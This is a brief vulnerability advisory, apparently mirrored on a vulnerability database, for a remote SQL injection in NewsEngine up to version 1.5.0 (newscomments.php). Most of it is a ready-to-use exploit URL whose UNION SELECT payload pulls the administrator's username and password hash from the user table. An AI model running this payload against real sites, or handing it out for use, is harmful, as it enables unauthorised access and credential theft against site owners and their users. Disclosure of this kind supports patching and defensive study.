Lucene search
SecurityvulnsSECURITYVULNS:DOC:12997HistoryJun 06, 2006 - 12:00 a.m.
ewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
2006-06-0600:00:00
vulners.com
11
Title : NewsEngine <= 1.5.0(newscomments.php) Remote SQL Injection Vulnerability
Author : ajann
Vulnerability;
$$$ http://[target]/[path]/newscomments.php
Example:
$$
http://[target]/[path]/newscomments.php?newsid='//union//select//0,username,userpassword,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0//from//news1_user//where/**/userid=1/*
Admin MD5 HaSh